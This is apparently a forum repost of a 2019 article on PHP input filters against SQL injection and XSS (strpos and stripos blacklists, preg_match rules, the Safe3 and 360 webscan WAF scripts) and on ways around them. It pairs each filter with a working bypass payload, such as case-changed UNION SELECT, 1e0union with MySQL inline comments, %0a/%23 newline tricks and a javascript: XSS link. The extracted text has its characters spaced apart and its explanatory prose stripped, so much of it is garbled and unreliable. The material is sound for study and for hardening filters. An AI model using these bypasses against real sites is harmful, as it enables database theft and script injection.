搜索

[894] 2019-02-20_PHP代码层防护与绕过

文档创建者:s7ckTeam
浏览次数:11
最后更新:2025-01-16
2019-02-20_PHP代码层防护与绕过 P H P   B y p a s s   B y p a s s   2 0 1 9 - 0 2 - 2 0 0 x 0 1       S Q L X S S     P H P B y p a s s 0 x 0 2   1 使 s t r p o s P H P : < ? p h p $ s t r   =   " a n d | o r | u n i o n | s e l e c t | f r o m | w h e r e | l i m i t | o r d e r   b y | g u o u p   b y | < s c r i p t > | < / s c r i p t > " ; $ a r r = e x p l o d e ( " | " , $ s t r ) ; # p r i n t _ r ( $ a r r ) ; f o r e a c h ( $ a r r   a s   $ k e y = > $ v a l ) { $ f l a g = s t r p o s ( $ _ G E T [ ' i d ' ] , $ v a l ) ; i f   ( $ f l a g ) {       e c h o   ' E r r o r ' ;       e x i t ( ) ; } } ? > B y p a s s s t r p o s ( )   s t r p o s ( )   i d = 1   A N D   1 = 1   U N I O N   S E L E C T   1 2 3     F R O M   A D M I N 2 使 s t r i p o s       s t r p o s s t r i p o s ( )   -   P H P : < ? p h p $ s t r   =   " a n d | o r | u n i o n | s e l e c t | f r o m | w h e r e | l i m i t | o r d e r   b y | g u o u p   b y | < s c r i p t > | < / s c r i p t > " ; $ a r r = e x p l o d e ( " | " , $ s t r ) ; # p r i n t _ r ( $ a r r ) ; f o r e a c h ( $ a r r   a s   $ k e y = > $ v a l ) { $ f l a g = s t r p o s ( $ _ G E T [ ' i d ' ] , $ v a l ) ; i f   ( $ f l a g ) {       e c h o   ' E r r o r ' ;       e x i t ( ) ; } } ? > B y p a s s
$ f l a g 0 i d = < / s c r i p t > < a   h r e f = " j a v a s c r i p t : a l e r t ( / x s s / ) " > x s s t e s t < a > < ? p h p $ b l a c k l i s t _ k e y w o r d s   =   ' s e l e c t , f r o m , 1 = 1 , - - , u n i o n , # ' ; $ b l a c k l i s t   =   e x p l o d e ( ' , ' , $ b l a c k l i s t _ k e y w o r d s ) ; p r i n t _ r ( $ b l a c k l i s t ) ; f o r e a c h ( $ b l a c k l i s t   a s   $ k e y = > $ v a l u e ) {       / / $ _ R E Q U E S T [ ' i d ' ]   =   s t r _ r e p l a c e ( s t r t o l o w e r ( $ v a l u e ) , ' ' , s t r t o l o w e r ( $ _ R E Q U E S T [ ' i d ' ] ) ) ;                                     $ _ R E Q U E S T [ ' i d ' ]   =   s t r _ r e p l a c e ( $ v a l u e , ' ' , $ _ R E Q U E S T [ ' i d ' ] ) ; } e c h o   $ _ R E Q U E S T [ ' i d ' ] ; ? > 0 x 0 3   1 b     " u n i o n "   P H P : < ? p h p i f     ( p r e g _ m a t c h ( " / b ( u n i o n | s e l e c t | f r o m ) b / i " , $ _ G E T [ ' i d ' ] ) = = 1 ) {         e c h o   " E r r o r " ;       e x i t ( ) ; } e c h o   " s u c c e s s "   ; ? > B y p a s s i d = 1 e 0 u n i o n / * ! 1 2 3 4 5 s e l e c t * / 1 , 2 , 3 , 4 / * ! 1 2 3 4 5 f r o m * / u s e r s 2 i   P H P : < ? p h p i f     ( p r e g _ m a t c h ( " / ( ? : ( u n i o n ( . * ? ) s e l e c t ) ) / i " , $ _ G E T [ ' i d ' ] ) = = 1 ) {         e c h o   " E r r o r " ;       e x i t ( ) ; } e c h o   " s u c c e s s "   ; ? > B y p a s s   n u r l % 0 a i d = 1   u n i o n % 2 3 % 0 a s e l e C T   1 , 2 , 3 , 4   f r o m   u s e r s
    p r e g _ m a t c h ( " / ( ? : ( u n i o n ( . * ? ) s e l e c t ) ) / i m s " , $ _ G E T [ ' i d ' ] ) 0 x 0 4   P H P 1 s a f e 3   < ? p h p / / C o d e   B y   S a f e 3   i n i _ s e t ( ' d a t e . t i m e z o n e ' , ' A s i a / S h a n g h a i ' ) ; f u n c t i o n   c u s t o m E r r o r ( $ e r r n o ,   $ e r r s t r ,   $ e r r f i l e ,   $ e r r l i n e ) {       e c h o   " < b > E r r o r   n u m b e r : < / b >   [ $ e r r n o ] , e r r o r   o n   l i n e   $ e r r l i n e   i n   $ e r r f i l e < b r   / > " ;       d i e ( ) ; } s e t _ e r r o r _ h a n d l e r ( " c u s t o m E r r o r " , E _ E R R O R ) ; $ g e t f i l t e r = " ' | s e l e c t | f r o m | ( a n d | o r ) b . + ? ( > | < | = | i n | l i k e ) | / * . + ? * / | < s * s c r i p t b | b E X E C b | U N I O N . + ? S E L E C T | U P D A T E . + ? S E T | I N S E R T s + I N T O . + ? V A L U E S | ( S E L E C T | D E L E T E ) . + ? F R O M | ( C R E A T E | A L T E R | D R O P | T R U N C A T E ) s + ( T A B L E | D A T A B A S E ) " ; $ p o s t f i l t e r = " b ( a n d | o r ) b . { 1 , 6 } ? ( = | > | < | b i n b | b l i k e b ) | / * . + ? * / | < s * s c r i p t b | b E X E C b | U N I O N . + ? S E L E C T | U P D A T E . + ? S E T | I N S E R T s + I N T O . + ? V A L U E S | ( S E L E C T | D E L E T E ) . + ? F R O M | ( C R E A T E | A L T E R | D R O P | T R U N C A T E ) s + ( T A B L E | D A T A B A S E ) " ; $ c o o k i e f i l t e r = " b ( a n d | o r ) b . { 1 , 6 } ? ( = | > | < | b i n b | b l i k e b ) | / * . + ? * / | < s * s c r i p t b | b E X E C b | U N I O N . + ? S E L E C T | U P D A T E . + ? S E T | I N S E R T s + I N T O . + ? V A L U E S | ( S E L E C T | D E L E T E ) . + ? F R O M | ( C R E A T E | A L T E R | D R O P | T R U N C A T E ) s + ( T A B L E | D A T A B A S E ) " ; f u n c t i o n   S t o p A t t a c k ( $ S t r F i l t K e y , $ S t r F i l t V a l u e , $ A r r F i l t R e q ) {       i f ( i s _ a r r a y ( $ S t r F i l t V a l u e ) )       {               $ S t r F i l t V a l u e = i m p l o d e ( $ S t r F i l t V a l u e ) ;       }       i f   ( p r e g _ m a t c h ( " / " . $ A r r F i l t R e q . " / i s " , $ S t r F i l t V a l u e ) = = 1 ) {               s l o g ( " < b r > < b r > I P :   " . $ _ S E R V E R [ " R E M O T E _ A D D R " ] . " < b r > :   " . s t r f t i m e ( " % Y - % m - % d   % H : % M : % S " ) . " < b r > : " . $ _ S E R V E R [ " P H P _ S E L F " ] . " < b r > :   " . $ _ S E R V E R [ " R E Q U E S T _ M E T H O D " ] . " < b r > :   " . $ S t r F i l t K e y . " < b r > : " . $ S t r F i l t V a l u e ) ;               @ h e a d e r ( " h t t p / 1 . 1   4 0 4   n o t   f o u n d " ) ;                 p r i n t   " < h t m l > < t i t l e > 4 0 4 :   N o t   F o u n d < / t i t l e > " ;               / / s l o g ( " < b r > < b r > I P :   " . $ _ S E R V E R [ " R E M O T E _ A D D R " ] . " < b r > :   " . s t r f t i m e ( " % Y - % m - % d   % H : % M : % S " ) . " < b r > : " . $ _ S E R V E R [ " P H P _ S E L F " ] . " < b r > :   " . $ _ S E R V E R [ " R E Q U E S T _ M E T H O D " ] . " < b r > :   " . $ S t r F i l t K e y . " < b r > : " . $ S t r F i l t V a l u e ) ;               p r i n t   " < b o d y > U r l , ! . . .   < a   h r e f = ' / ' > < / a > < / b o d y > < / h t m l > " ;   ; e x i t ( ) ;       } } / / $ A r r P G C = a r r a y _ m e r g e ( $ _ G E T , $ _ P O S T , $ _ C O O K I E ) ; f o r e a c h ( $ _ G E T   a s   $ k e y = > $ v a l u e ) {       S t o p A t t a c k ( $ k e y , $ v a l u e , $ g e t f i l t e r ) ; } f o r e a c h ( $ _ P O S T   a s   $ k e y = > $ v a l u e ) {       S t o p A t t a c k ( $ k e y , $ v a l u e , $ p o s t f i l t e r ) ; } f o r e a c h ( $ _ C O O K I E   a s   $ k e y = > $ v a l u e ) {       S t o p A t t a c k ( $ k e y , $ v a l u e , $ c o o k i e f i l t e r ) ; } f u n c t i o n   s l o g ( $ l o g s ) {       $ t o p p a t h = $ _ S E R V E R [ " D O C U M E N T _ R O O T " ] . " / l o g . h t m " ;       $ T s = f o p e n ( $ t o p p a t h , " a + " ) ;       f p u t s ( $ T s , $ l o g s . " r n " ) ;       f c l o s e ( $ T s ) ; } ? > 2 3 6 0 w e b s c a n
    3 6 0 h t t p : / / w e b s c a n . 3 6 0 . c n     h t t p : / / w e b s c a n . 3 6 0 . c n / p r o t e c t / i n d e x / ? a c t = r e i n s t a l l & d o m a i n = w w w . t e s t . c o m 3 6 0 w e b s c a n . z i p         c m s e a s y c m s   w e b s c a n 3 6 0 / 3 6 0 s a f e :   h t t p s : / / p a n . b a i d u . c o m / s / 1 n v i N i 2 l   :   3 i t q     W E B S C A N _ V E R S I O N   0 . 1 . 3 . 2   S Q L   B y p a s s         U N I O N . + ? S E L E C T s * ( ( . + ) s * | @ { 1 , 2 } . + ? s * | s + ? . + ? | ( ` | ' | " ) . * ? ( ` | ' | " ) s * )     ( S E L E C T | D E L E T E ) @ { 0 , 2 } ( ( . + ) | s + ? . + ? s + ? | ( ` | ' | " ) . * ? ( ` | ' | " ) ) F R O M ( ( . + ) | s + ? . + ? | ( ` | ' | " ) . * ? ( ` | ' | " ) )     i d = 1 e 0 u n i o n   s e l e c t ! 1 , u s e r ( ) , 3 , 4   f r o m   u s e r s
0 x 0 5          
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理